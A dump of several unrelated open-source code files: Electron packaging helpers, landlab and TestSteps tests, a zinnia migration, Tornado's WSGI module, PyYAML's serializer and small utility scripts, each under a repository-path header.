    """Bundle whitelisted system libraries the executable links against."""
    executable_path = os.path.join(OUT_DIR, PROJECT_NAME)  # out/R/electron
    ldd = execute(['ldd', executable_path])
    # Matches ldd output lines of the form "\tname => path (addr)".
    lib_re = re.compile('\t(.*) => (.+) \(.*\)$')
    for line in ldd.splitlines():
        m = lib_re.match(line)
        if not m:
            continue
        for i, library in enumerate(SYSTEM_LIBRARIES):
            real_library = m.group(1)
            if real_library.startswith(library):
                shutil.copyfile(m.group(2), os.path.join(DIST_DIR, real_library))
                # Record the resolved (versioned) name for create_dist_zip().
                SYSTEM_LIBRARIES[i] = real_library
def create_version():
    """Write the Electron version string to dist/version."""
    version_path = os.path.join(SOURCE_ROOT, 'dist', 'version')
    with open(version_path, 'w') as version_file:
        version_file.write(ATOM_SHELL_VERSION)
def create_symbols():
    """Dump Breakpad symbols for the built binaries into DIST_DIR."""
    destination = os.path.join(DIST_DIR, '{0}.breakpad.syms'.format(PROJECT_NAME))
    dump_symbols = os.path.join(SOURCE_ROOT, 'script', 'dump-symbols.py')
    execute([sys.executable, dump_symbols, destination])
def create_dist_zip():
    """Zip the distribution binaries, license and version file into dist/."""
    dist_name = '{0}-{1}-{2}-{3}.zip'.format(
        PROJECT_NAME, ATOM_SHELL_VERSION, PLATFORM, get_target_arch())
    zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
    with scoped_cwd(DIST_DIR):
        files = TARGET_BINARIES[PLATFORM] + ['LICENSE', 'version']
        if PLATFORM == 'linux':
            # Only bundle system libraries that were actually copied.
            files.extend(lib for lib in SYSTEM_LIBRARIES if os.path.exists(lib))
        make_zip(zip_file, files, TARGET_DIRECTORIES[PLATFORM])
def create_chrome_binary_zip(binary, version):
    """Zip a single Chromium helper binary together with the license."""
    dist_name = '{0}-{1}-{2}-{3}.zip'.format(
        binary, version, PLATFORM, get_target_arch())
    zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
    with scoped_cwd(DIST_DIR):
        name = binary + '.exe' if PLATFORM == 'win32' else binary
        make_zip(zip_file, ['LICENSE', name], [])
def create_symbols_zip():
    """Zip the breakpad symbol tree plus the license and version files."""
    dist_name = '{0}-{1}-{2}-{3}-symbols.zip'.format(
        PROJECT_NAME, ATOM_SHELL_VERSION, PLATFORM, get_target_arch())
    zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
    with scoped_cwd(DIST_DIR):
        make_zip(zip_file, ['LICENSE', 'version'],
                 ['{0}.breakpad.syms'.format(PROJECT_NAME)])
if __name__ == '__main__':
sys.exit(main())
|
decvalts/landlab | refs/heads/master | landlab/grid/tests/test_raster_funcs/test_gradients_at_active_links.py | 1 | import numpy as np
from numpy.testing import assert_array_equal
from nose import with_setup
try:
from nose.tools import assert_is
except ImportError:
from landlab.testing.tools import assert_is
from landlab import RasterModelGrid
_GRIDS = {}
def setup_grids():
    """Populate the module-level grid cache used by every test."""
    _GRIDS['unit'] = RasterModelGrid(4, 5)
    _GRIDS['non_unit'] = RasterModelGrid(4, 5, 2.)
@with_setup(setup_grids)
def test_unit_spacing():
    """Gradients on a unit-spacing grid equal the raw node differences."""
    rmg = _GRIDS['unit']
    values_at_nodes = np.arange(20)
    expected = np.array([5, 5, 5, 5, 5, 5, 5, 5, 5,
                         1, 1, 1, 1, 1, 1, 1, 1])
    grads = rmg.calculate_gradients_at_active_links(values_at_nodes)
    assert_array_equal(grads, expected)
    # With unit spacing the gradient and the plain difference coincide.
    diffs = rmg.calculate_diff_at_active_links(values_at_nodes)
    assert_array_equal(grads, diffs)
@with_setup(setup_grids)
def test_non_unit_spacing():
    """Gradients scale by the inverse node spacing on a non-unit grid."""
    rmg = _GRIDS['non_unit']
    values_at_nodes = np.arange(20)
    expected = (1. / rmg.node_spacing) * np.array(
        [5, 5, 5, 5, 5, 5, 5, 5, 5,
         1, 1, 1, 1, 1, 1, 1, 1])
    grads = rmg.calculate_gradients_at_active_links(values_at_nodes)
    assert_array_equal(grads, expected)
    diffs = rmg.calculate_diff_at_active_links(values_at_nodes)
    assert_array_equal(grads, (1. / rmg.node_spacing) * diffs)
@with_setup(setup_grids)
def test_out_array():
    """An ``out`` buffer is filled in place and returned as-is."""
    rmg = _GRIDS['non_unit']
    values_at_nodes = np.arange(20)
    output_array = np.empty(17)
    rtn_array = rmg.calculate_gradients_at_active_links(values_at_nodes,
                                                        out=output_array)
    expected = np.array([5, 5, 5, 5, 5, 5, 5, 5, 5,
                         1, 1, 1, 1, 1, 1, 1, 1]) / rmg.node_spacing
    assert_array_equal(rtn_array, expected)
    # The returned array must be the very buffer the caller supplied.
    assert_is(rtn_array, output_array)
@with_setup(setup_grids)
def test_diff_out_array():
    """calculate_diff_at_active_links also honours the ``out`` argument."""
    rmg = RasterModelGrid(4, 5)
    values = np.arange(20)
    out_buffer = np.empty(17)
    rtn_diff = rmg.calculate_diff_at_active_links(values, out=out_buffer)
    expected = np.array([5, 5, 5, 5, 5, 5, 5, 5, 5,
                         1, 1, 1, 1, 1, 1, 1, 1])
    assert_array_equal(out_buffer, expected)
    assert_is(rtn_diff, out_buffer)
|
saurabh6790/test-erp | refs/heads/develop | erpnext/selling/doctype/product_bundle/__init__.py | 12133432 | |
Fantomas42/django-blog-zinnia | refs/heads/develop | zinnia/migrations/0002_lead_paragraph_and_image_caption.py | 3 | from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
    """Add the ``lead`` and ``image_caption`` text fields to Entry."""

    dependencies = [
        ('zinnia', '0001_initial'),
    ]

    operations = [
        # Optional caption shown with the entry's illustration image.
        migrations.AddField(
            model_name='entry',
            name='image_caption',
            field=models.TextField(
                help_text="Image's caption.",
                verbose_name='caption', blank=True),
            preserve_default=False,
        ),
        # Optional lead paragraph displayed before the entry content.
        migrations.AddField(
            model_name='entry',
            name='lead',
            field=models.TextField(
                help_text='Lead paragraph',
                verbose_name='lead', blank=True),
            preserve_default=False,
        ),
    ]
|
steven004/TestSteps | refs/heads/master | test_examples/test_lesson1_autolog.py | 1 | __author__ = 'Steven LI'
from test_steps import *
import logging, time
def my_add(*args):
    """Return the sum of all positional arguments (0 when called empty)."""
    total = 0
    for value in args:
        total += value
    return total
def my_mul(*args):
    """Return the product of all positional arguments (1 when called empty)."""
    product = 1
    for factor in args:
        product *= factor
    return product
def test_logger_setup():
    """Attach a timestamped file handler to test_logger.

    Since test_steps 0.6.1 file logging is no longer installed by
    default, so tests add their own handler explicitly.
    """
    file_name = time.strftime('/tmp/test' + "_%Y%m%d_%H%M.log")
    handler = logging.FileHandler(file_name)
    handler.setFormatter(
        logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
    test_logger.addHandler(handler)
def test_basic():
    """Exercise each basic auto-logging check helper once.

    Each check is written to the log configured by test_logger_setup();
    execution stops at the first failing check (the ok(3>5, ...) call).
    """
    test_logger.info("To show the basic auto-log functions")
    ## eq(expr1, expr2, passdesc='', faildesc='')
    eq(my_add(3,4,5), my_mul(3,4), "3+4+5 == 3*4")
    ne(my_add(3,4,6), 12)
    gt(my_add(3,4,5), 10)
    ge(my_mul(3,4), 11)
    lt(my_add(5,6,7), my_add(3,4,5,7))
    le(my_add(5,6,7), my_add(3,4,5,6))
    match("Shanghai City", "City") #regex can be used for the 2nd parameter
    unmatch("I ate an apple", r'banana|orange')
    ## ok(boolean_expr, passdesc='', faildesc='')
    ok(3>5, "3<5, logged when pass... ", "3<5, logged when fail")
    fail("Just fail and log. nothing more")
    ## The following logging information will be auto-logged in log file when running the test_basic
    ## The log file is '/tmp/test_yyyymmdd_hhmm.log'
    ##
    '''
    2015-01-15 20:09:13,731 - INFO - To show the basic auto-log functions
    2015-01-15 20:09:13,746 - INFO - ------------------------------------------------------
    2015-01-15 20:09:13,746 - INFO - Func test_basic in file: /TestSteps/test_examples/test_lesson1_autolog.py
    2015-01-15 20:09:13,746 - INFO - Check-1: 3+4+5 == 3*4 - PASS - 12 == 12?
    2015-01-15 20:09:13,746 - INFO - Check-2: 13 != 12 - PASS - 13 != 12?
    2015-01-15 20:09:13,746 - INFO - Check-3: 12 > 10 - PASS - 12 > 10?
    2015-01-15 20:09:13,746 - INFO - Check-4: 12 >= 11 - PASS - 12 >= 11?
    2015-01-15 20:09:13,746 - INFO - Check-5: 18 < 19 - PASS - 18 < 19?
    2015-01-15 20:09:13,747 - INFO - Check-6: 18 <= 18 - PASS - 18 <= 18?
    2015-01-15 20:09:13,747 - INFO - Check-7: 'Shanghai City' =~ 'City' - PASS - 'Shanghai City' =~ 'City'?
    2015-01-15 20:09:13,747 - INFO - Check-8: 'I ate an apple' !~ 'banana|orange' - PASS - 'I ate an apple' !~ 'banana|orange'?
    2015-01-15 20:09:13,747 - ERROR - Check-9: 3<5, logged when fail - FAIL -
    '''
########################################################################################
# Program stop on a failed step. (if you want it continue, take more lessons)
# Take lesson 2 to get more powerful functions
########################################################################################
if __name__ == '__main__':
test_logger_setup()
test_basic() |
acarmel/CouchPotatoServer | refs/heads/master | libs/tornado/wsgi.py | 73 | #!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""WSGI support for the Tornado web framework.
WSGI is the Python standard for web servers, and allows for interoperability
between Tornado and other Python web frameworks and servers. This module
provides WSGI support in two ways:
* `WSGIAdapter` converts a `tornado.web.Application` to the WSGI application
interface. This is useful for running a Tornado app on another
HTTP server, such as Google App Engine. See the `WSGIAdapter` class
documentation for limitations that apply.
* `WSGIContainer` lets you run other WSGI applications and frameworks on the
Tornado HTTP server. For example, with this class you can mix Django
and Tornado handlers in a single server.
"""
from __future__ import absolute_import, division, print_function, with_statement
import sys
from io import BytesIO
import tornado
from tornado.concurrent import Future
from tornado import escape
from tornado import httputil
from tornado.log import access_log
from tornado import web
from tornado.escape import native_str
from tornado.util import unicode_type
try:
import urllib.parse as urllib_parse # py3
except ImportError:
import urllib as urllib_parse
# PEP 3333 specifies that WSGI on python 3 generally deals with byte strings
# that are smuggled inside objects of type unicode (via the latin1 encoding).
# These functions are like those in the tornado.escape module, but defined
# here to minimize the temptation to use them in non-wsgi contexts.
# PEP 3333: WSGI smuggles bytes inside native `str` objects via latin1.
# On Python 3 (str is unicode) we must encode/decode; on Python 2 the
# native str already *is* bytes, so these are identity checks only.
if str is unicode_type:
    def to_wsgi_str(s):
        # bytes -> WSGI "native string" (latin1-decoded unicode).
        assert isinstance(s, bytes)
        return s.decode('latin1')

    def from_wsgi_str(s):
        # WSGI "native string" -> raw bytes.
        assert isinstance(s, str)
        return s.encode('latin1')
else:
    def to_wsgi_str(s):
        assert isinstance(s, bytes)
        return s

    def from_wsgi_str(s):
        assert isinstance(s, str)
        return s
class WSGIApplication(web.Application):
    """A WSGI equivalent of `tornado.web.Application`.

    .. deprecated:: 4.0

       Use a regular `.Application` and wrap it in `WSGIAdapter` instead.
    """
    def __call__(self, environ, start_response):
        # Delegate to a freshly wrapped WSGIAdapter on every request.
        return WSGIAdapter(self)(environ, start_response)
# WSGI has no facilities for flow control, so just return an already-done
# Future when the interface requires it.
_dummy_future = Future()
_dummy_future.set_result(None)
class _WSGIConnection(httputil.HTTPConnection):
    """Adapts Tornado's HTTPConnection interface onto WSGI's start_response.

    Response chunks are accumulated in ``_write_buffer`` and handed back
    to the WSGI server by `WSGIAdapter.__call__` once the handler is done.
    """
    def __init__(self, method, start_response, context):
        self.method = method
        self.start_response = start_response
        self.context = context
        self._write_buffer = []
        self._finished = False
        # When Content-Length is declared, counts the bytes still allowed;
        # None means no length checking.
        self._expected_content_remaining = None
        self._error = None

    def set_close_callback(self, callback):
        # WSGI has no facility for detecting a closed connection
        # mid-request, so we can simply ignore the callback.
        pass

    def write_headers(self, start_line, headers, chunk=None, callback=None):
        """Invoke start_response and optionally write the first body chunk."""
        if self.method == 'HEAD':
            # HEAD responses must not carry a body at all.
            self._expected_content_remaining = 0
        elif 'Content-Length' in headers:
            self._expected_content_remaining = int(headers['Content-Length'])
        else:
            self._expected_content_remaining = None
        self.start_response(
            '%s %s' % (start_line.code, start_line.reason),
            [(native_str(k), native_str(v)) for (k, v) in headers.get_all()])
        if chunk is not None:
            self.write(chunk, callback)
        elif callback is not None:
            callback()
        # WSGI provides no flow control, so hand back a resolved future.
        return _dummy_future

    def write(self, chunk, callback=None):
        """Buffer a body chunk, enforcing the declared Content-Length."""
        if self._expected_content_remaining is not None:
            self._expected_content_remaining -= len(chunk)
            if self._expected_content_remaining < 0:
                self._error = httputil.HTTPOutputError(
                    "Tried to write more data than Content-Length")
                raise self._error
        self._write_buffer.append(chunk)
        if callback is not None:
            callback()
        return _dummy_future

    def finish(self):
        """Mark the response complete; fail if Content-Length wasn't met."""
        if (self._expected_content_remaining is not None and
                self._expected_content_remaining != 0):
            self._error = httputil.HTTPOutputError(
                "Tried to write %d bytes less than Content-Length" %
                self._expected_content_remaining)
            raise self._error
        self._finished = True
class _WSGIRequestContext(object):
    """Minimal connection context: client address and URL scheme only."""
    def __init__(self, remote_ip, protocol):
        self.remote_ip = remote_ip
        self.protocol = protocol

    def __str__(self):
        # Used by Tornado's access logging to identify the client.
        return self.remote_ip
class WSGIAdapter(object):
    """Converts a `tornado.web.Application` instance into a WSGI application.

    Example usage::

        import tornado.web
        import tornado.wsgi
        import wsgiref.simple_server

        class MainHandler(tornado.web.RequestHandler):
            def get(self):
                self.write("Hello, world")

        if __name__ == "__main__":
            application = tornado.web.Application([
                (r"/", MainHandler),
            ])
            wsgi_app = tornado.wsgi.WSGIAdapter(application)
            server = wsgiref.simple_server.make_server('', 8888, wsgi_app)
            server.serve_forever()

    See the `appengine demo
    <https://github.com/tornadoweb/tornado/tree/stable/demos/appengine>`_
    for an example of using this module to run a Tornado app on Google
    App Engine.

    In WSGI mode asynchronous methods are not supported.  This means
    that it is not possible to use `.AsyncHTTPClient`, or the
    `tornado.auth` or `tornado.websocket` modules.

    .. versionadded:: 4.0
    """
    def __init__(self, application):
        if isinstance(application, WSGIApplication):
            # Bypass WSGIApplication.__call__, which would otherwise
            # recurse by constructing another WSGIAdapter.
            self.application = lambda request: web.Application.__call__(
                application, request)
        else:
            self.application = application

    def __call__(self, environ, start_response):
        """WSGI entry point: rebuild an HTTPServerRequest from *environ*."""
        method = environ["REQUEST_METHOD"]
        # Reassemble the request URI from SCRIPT_NAME + PATH_INFO,
        # re-quoting the latin1-smuggled bytes (PEP 3333).
        uri = urllib_parse.quote(from_wsgi_str(environ.get("SCRIPT_NAME", "")))
        uri += urllib_parse.quote(from_wsgi_str(environ.get("PATH_INFO", "")))
        if environ.get("QUERY_STRING"):
            uri += "?" + environ["QUERY_STRING"]
        headers = httputil.HTTPHeaders()
        # Content-Type/Length live in dedicated CGI keys, not HTTP_*.
        if environ.get("CONTENT_TYPE"):
            headers["Content-Type"] = environ["CONTENT_TYPE"]
        if environ.get("CONTENT_LENGTH"):
            headers["Content-Length"] = environ["CONTENT_LENGTH"]
        for key in environ:
            if key.startswith("HTTP_"):
                headers[key[5:].replace("_", "-")] = environ[key]
        if headers.get("Content-Length"):
            body = environ["wsgi.input"].read(
                int(headers["Content-Length"]))
        else:
            body = b""
        protocol = environ["wsgi.url_scheme"]
        remote_ip = environ.get("REMOTE_ADDR", "")
        if environ.get("HTTP_HOST"):
            host = environ["HTTP_HOST"]
        else:
            host = environ["SERVER_NAME"]
        connection = _WSGIConnection(method, start_response,
                                     _WSGIRequestContext(remote_ip, protocol))
        request = httputil.HTTPServerRequest(
            method, uri, "HTTP/1.1", headers=headers, body=body,
            host=host, connection=connection)
        request._parse_body()
        self.application(request)
        if connection._error:
            raise connection._error
        if not connection._finished:
            # Async handlers cannot work under WSGI; the response must be
            # complete by the time the application call returns.
            raise Exception("request did not finish synchronously")
        return connection._write_buffer
class WSGIContainer(object):
    r"""Makes a WSGI-compatible function runnable on Tornado's HTTP server.

    .. warning::

       WSGI is a *synchronous* interface, while Tornado's concurrency model
       is based on single-threaded asynchronous execution.  This means that
       running a WSGI app with Tornado's `WSGIContainer` is *less scalable*
       than running the same app in a multi-threaded WSGI server like
       ``gunicorn`` or ``uwsgi``.  Use `WSGIContainer` only when there are
       benefits to combining Tornado and WSGI in the same process that
       outweigh the reduced scalability.

    Wrap a WSGI function in a `WSGIContainer` and pass it to `.HTTPServer`
    to run it.  For example::

        def simple_app(environ, start_response):
            status = "200 OK"
            response_headers = [("Content-type", "text/plain")]
            start_response(status, response_headers)
            return ["Hello world!\n"]

        container = tornado.wsgi.WSGIContainer(simple_app)
        http_server = tornado.httpserver.HTTPServer(container)
        http_server.listen(8888)
        tornado.ioloop.IOLoop.instance().start()

    This class is intended to let other frameworks (Django, web.py, etc)
    run on the Tornado HTTP server and I/O loop.

    The `tornado.web.FallbackHandler` class is often useful for mixing
    Tornado and WSGI apps in the same server.  See
    https://github.com/bdarnell/django-tornado-demo for a complete example.
    """
    def __init__(self, wsgi_application):
        self.wsgi_application = wsgi_application

    def __call__(self, request):
        """Run the wrapped WSGI app for *request* and write the response."""
        data = {}
        response = []

        def start_response(status, response_headers, exc_info=None):
            # Capture status/headers for use after the app returns; the
            # returned callable is WSGI's legacy write() interface.
            data["status"] = status
            data["headers"] = response_headers
            return response.append
        app_response = self.wsgi_application(
            WSGIContainer.environ(request), start_response)
        try:
            response.extend(app_response)
            body = b"".join(response)
        finally:
            # PEP 3333 requires close() to be called on the app iterable.
            if hasattr(app_response, "close"):
                app_response.close()
        if not data:
            raise Exception("WSGI app did not call start_response")
        status_code = int(data["status"].split()[0])
        headers = data["headers"]
        header_set = set(k.lower() for (k, v) in headers)
        body = escape.utf8(body)
        # Fill in headers the app omitted; 304 responses carry no body,
        # so no Content-Length/Type is synthesized for them.
        if status_code != 304:
            if "content-length" not in header_set:
                headers.append(("Content-Length", str(len(body))))
            if "content-type" not in header_set:
                headers.append(("Content-Type", "text/html; charset=UTF-8"))
        if "server" not in header_set:
            headers.append(("Server", "TornadoServer/%s" % tornado.version))
        parts = [escape.utf8("HTTP/1.1 " + data["status"] + "\r\n")]
        for key, value in headers:
            parts.append(escape.utf8(key) + b": " + escape.utf8(value) + b"\r\n")
        parts.append(b"\r\n")
        parts.append(body)
        request.write(b"".join(parts))
        request.finish()
        self._log(status_code, request)

    @staticmethod
    def environ(request):
        """Converts a `tornado.httputil.HTTPServerRequest` to a WSGI
        environment.
        """
        hostport = request.host.split(":")
        if len(hostport) == 2:
            host = hostport[0]
            port = int(hostport[1])
        else:
            host = request.host
            # No explicit port in the Host header: infer from the scheme.
            port = 443 if request.protocol == "https" else 80
        environ = {
            "REQUEST_METHOD": request.method,
            "SCRIPT_NAME": "",
            "PATH_INFO": to_wsgi_str(escape.url_unescape(
                request.path, encoding=None, plus=False)),
            "QUERY_STRING": request.query,
            "REMOTE_ADDR": request.remote_ip,
            "SERVER_NAME": host,
            "SERVER_PORT": str(port),
            "SERVER_PROTOCOL": request.version,
            "wsgi.version": (1, 0),
            "wsgi.url_scheme": request.protocol,
            "wsgi.input": BytesIO(escape.utf8(request.body)),
            "wsgi.errors": sys.stderr,
            "wsgi.multithread": False,
            "wsgi.multiprocess": True,
            "wsgi.run_once": False,
        }
        # Content-Type/Length get dedicated CGI keys rather than the
        # generic HTTP_ prefix used for all other headers below.
        if "Content-Type" in request.headers:
            environ["CONTENT_TYPE"] = request.headers.pop("Content-Type")
        if "Content-Length" in request.headers:
            environ["CONTENT_LENGTH"] = request.headers.pop("Content-Length")
        for key, value in request.headers.items():
            environ["HTTP_" + key.replace("-", "_").upper()] = value
        return environ

    def _log(self, status_code, request):
        # Log severity tracks status class: 2xx/3xx info, 4xx warning,
        # 5xx error.
        if status_code < 400:
            log_method = access_log.info
        elif status_code < 500:
            log_method = access_log.warning
        else:
            log_method = access_log.error
        request_time = 1000.0 * request.request_time()
        summary = request.method + " " + request.uri + " (" + \
            request.remote_ip + ")"
        log_method("%d %s %.2fms", status_code, summary, request_time)
HTTPRequest = httputil.HTTPServerRequest
|
kidmaple/CoolWall | refs/heads/nios2 | user/python/Tools/compiler/dumppyc.py | 3 | #! /usr/bin/env python
import marshal
import dis
import types
def dump(obj):
    """Print *obj* and every attribute dir() reports (Python 2 script)."""
    print obj
    for attr in dir(obj):
        print "\t", attr, repr(getattr(obj, attr))
def loadCode(path):
    """Read a .pyc file at *path* and return its top-level code object.

    The leading 8 bytes (magic number + timestamp header in this
    script's era of .pyc format) are skipped; the marshalled code
    object follows.
    """
    # Fix: open in binary mode -- marshal data is raw bytes, and text
    # mode corrupts it on platforms that translate line endings.
    f = open(path, "rb")
    f.read(8)
    co = marshal.load(f)
    f.close()
    return co
def walk(co, match=None):
    """Recursively disassemble *co* and all nested code objects.

    When *match* is given, only code objects whose co_name equals it
    are dumped and disassembled, but recursion still visits every
    constant so nested matches are found.  (Python 2 script.)
    """
    if match is None or co.co_name == match:
        dump(co)
        print
        dis.dis(co)
    for obj in co.co_consts:
        if type(obj) == types.CodeType:
            walk(obj, match)
def main(filename, codename=None):
    """Load *filename* and disassemble it, optionally only *codename*."""
    walk(loadCode(filename), codename)
if __name__ == "__main__":
import sys
if len(sys.argv) == 3:
filename, codename = sys.argv[1:]
else:
filename = sys.argv[1]
codename = None
main(filename, codename)
|
msebire/intellij-community | refs/heads/master | python/testData/completion/py3595/moduleX.py | 83 | import smname
import smname.moduleY
smname.moduleY.mod<caret>
|
ramondeklein/energymeter | refs/heads/master | log.py | 1 | from config import configuration
import logging
import os
def initialize_logging(section):
    """Configure the root logger from the given configuration *section*.

    Reads the optional ``logfile`` and ``loglevel`` options.  An invalid
    ``loglevel`` falls back to INFO and is reported through the logger
    once logging is configured.
    """
    def get_option(name, default=None):
        # configparser-style lookup with a default for missing options.
        if configuration.has_option(section, name):
            return configuration.get(section, name)
        return default

    # Default is no log warnings
    log_warnings = []

    log_file = get_option('logfile')
    log_level_text = get_option('loglevel', 'INFO').lower()

    # Map the textual level onto the logging module's constants.
    levels = {
        'debug': logging.DEBUG,
        'info': logging.INFO,
        'warn': logging.WARN,
        'error': logging.ERROR,
    }
    if log_level_text not in levels:
        log_warnings.append('[{}] has invalid loglevel "{}" (reverting to INFO level).'.format(section, log_level_text))
        log_level_text = 'info'
    log_level = levels[log_level_text]

    log_format = '%(asctime)s:%(thread)d:%(levelname)s:%(message)s'
    if log_file:
        # Make sure the logfile's directory exists before logging opens it.
        log_file = os.path.abspath(log_file)
        log_directory = os.path.dirname(log_file)
        if not os.path.exists(log_directory):
            os.makedirs(log_directory)
        logging.basicConfig(format=log_format, filename=log_file, level=log_level)
    else:
        logging.basicConfig(format=log_format, level=log_level)

    logger = logging.getLogger(__name__)
    logger.info('Starting (using level {})'.format(log_level_text.upper()))

    # Report deferred configuration warnings.  Fix: Logger.warn is a
    # deprecated alias of Logger.warning.
    for warning in log_warnings:
        logger.warning(warning)
|
ktarrant/options_csv | refs/heads/master | journal/trades/apps.py | 1 | from django.apps import AppConfig
class TradesConfig(AppConfig):
    """Django application configuration for the ``trades`` app."""
    name = 'trades'
|
jounex/hue | refs/heads/master | desktop/core/ext-py/PyYAML-3.09/lib3/yaml/serializer.py | 293 |
__all__ = ['Serializer', 'SerializerError']
from .error import YAMLError
from .events import *
from .nodes import *
class SerializerError(YAMLError):
    """Raised when the serializer is used while in an invalid state."""
    pass
class Serializer:
    """Walks a representation node graph and emits the matching YAML events.

    Handles stream/document framing, and assigns anchors to nodes that
    are referenced more than once so repeated nodes become aliases.
    """

    # Template for auto-generated anchor names: id001, id002, ...
    ANCHOR_TEMPLATE = 'id%03d'

    def __init__(self, encoding=None,
            explicit_start=None, explicit_end=None, version=None, tags=None):
        self.use_encoding = encoding
        self.use_explicit_start = explicit_start
        self.use_explicit_end = explicit_end
        self.use_version = version
        self.use_tags = tags
        # Per-document bookkeeping, reset after each serialize() call.
        self.serialized_nodes = {}
        self.anchors = {}
        self.last_anchor_id = 0
        # None: never opened; False: open; True: closed.
        self.closed = None

    def open(self):
        """Emit the stream start event; valid exactly once."""
        if self.closed is None:
            self.emit(StreamStartEvent(encoding=self.use_encoding))
            self.closed = False
        elif self.closed:
            raise SerializerError("serializer is closed")
        else:
            raise SerializerError("serializer is already opened")

    def close(self):
        """Emit the stream end event; a no-op if already closed."""
        if self.closed is None:
            raise SerializerError("serializer is not opened")
        elif not self.closed:
            self.emit(StreamEndEvent())
            self.closed = True

    #def __del__(self):
    #    self.close()

    def serialize(self, node):
        """Serialize one document rooted at *node* between open()/close()."""
        if self.closed is None:
            raise SerializerError("serializer is not opened")
        elif self.closed:
            raise SerializerError("serializer is closed")
        self.emit(DocumentStartEvent(explicit=self.use_explicit_start,
            version=self.use_version, tags=self.use_tags))
        # Pass 1 assigns anchors to shared nodes; pass 2 emits events.
        self.anchor_node(node)
        self.serialize_node(node, None, None)
        self.emit(DocumentEndEvent(explicit=self.use_explicit_end))
        self.serialized_nodes = {}
        self.anchors = {}
        self.last_anchor_id = 0

    def anchor_node(self, node):
        """Record nodes recursively; a second visit earns a real anchor."""
        if node in self.anchors:
            # Seen before: promote from "no anchor yet" (None) to a
            # generated anchor so it can be aliased.
            if self.anchors[node] is None:
                self.anchors[node] = self.generate_anchor(node)
        else:
            self.anchors[node] = None
            if isinstance(node, SequenceNode):
                for item in node.value:
                    self.anchor_node(item)
            elif isinstance(node, MappingNode):
                for key, value in node.value:
                    self.anchor_node(key)
                    self.anchor_node(value)

    def generate_anchor(self, node):
        # Anchors are simply sequential: id001, id002, ...
        self.last_anchor_id += 1
        return self.ANCHOR_TEMPLATE % self.last_anchor_id

    def serialize_node(self, node, parent, index):
        """Emit events for *node*; nodes already emitted become aliases."""
        alias = self.anchors[node]
        if node in self.serialized_nodes:
            self.emit(AliasEvent(alias))
        else:
            self.serialized_nodes[node] = True
            self.descend_resolver(parent, index)
            if isinstance(node, ScalarNode):
                # A tag is "implicit" when the resolver would infer the
                # same tag from the value anyway.
                detected_tag = self.resolve(ScalarNode, node.value, (True, False))
                default_tag = self.resolve(ScalarNode, node.value, (False, True))
                implicit = (node.tag == detected_tag), (node.tag == default_tag)
                self.emit(ScalarEvent(alias, node.tag, implicit, node.value,
                    style=node.style))
            elif isinstance(node, SequenceNode):
                implicit = (node.tag
                            == self.resolve(SequenceNode, node.value, True))
                self.emit(SequenceStartEvent(alias, node.tag, implicit,
                    flow_style=node.flow_style))
                index = 0
                for item in node.value:
                    self.serialize_node(item, node, index)
                    index += 1
                self.emit(SequenceEndEvent())
            elif isinstance(node, MappingNode):
                implicit = (node.tag
                            == self.resolve(MappingNode, node.value, True))
                self.emit(MappingStartEvent(alias, node.tag, implicit,
                    flow_style=node.flow_style))
                for key, value in node.value:
                    self.serialize_node(key, node, None)
                    self.serialize_node(value, node, key)
                self.emit(MappingEndEvent())
            self.ascend_resolver()
|
ahmedaljazzar/edx-platform | refs/heads/master | openedx/core/djangoapps/dark_lang/admin.py | 24 | """
Admin site bindings for dark_lang
"""
from config_models.admin import ConfigurationModelAdmin
from django.contrib import admin
from openedx.core.djangoapps.dark_lang.models import DarkLangConfig
# Expose DarkLangConfig through the standard ConfigurationModel admin UI.
admin.site.register(DarkLangConfig, ConfigurationModelAdmin)
|
joomel1/phantomjs | refs/heads/master | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/steps/postdiffforcommit.py | 147 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from webkitpy.tool.steps.abstractstep import AbstractStep
class PostDiffForCommit(AbstractStep):
    """Upload the working diff to the bug as a patch marked for landing."""
    def run(self, state):
        # The diff was already reviewed, so skip the review flag and
        # mark the patch for the commit queue instead.
        self._tool.bugs.add_patch_to_bug(
            state["bug_id"],
            self.cached_lookup(state, "diff"),
            "Patch for landing",
            mark_for_review=False,
            mark_for_landing=True)
|
kryptohash/kryptohash | refs/heads/master | share/qt/make_spinner.py | 563 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning animation from a .png
# Requires imagemagick 6.7+
from __future__ import division
from os import path
from PIL import Image
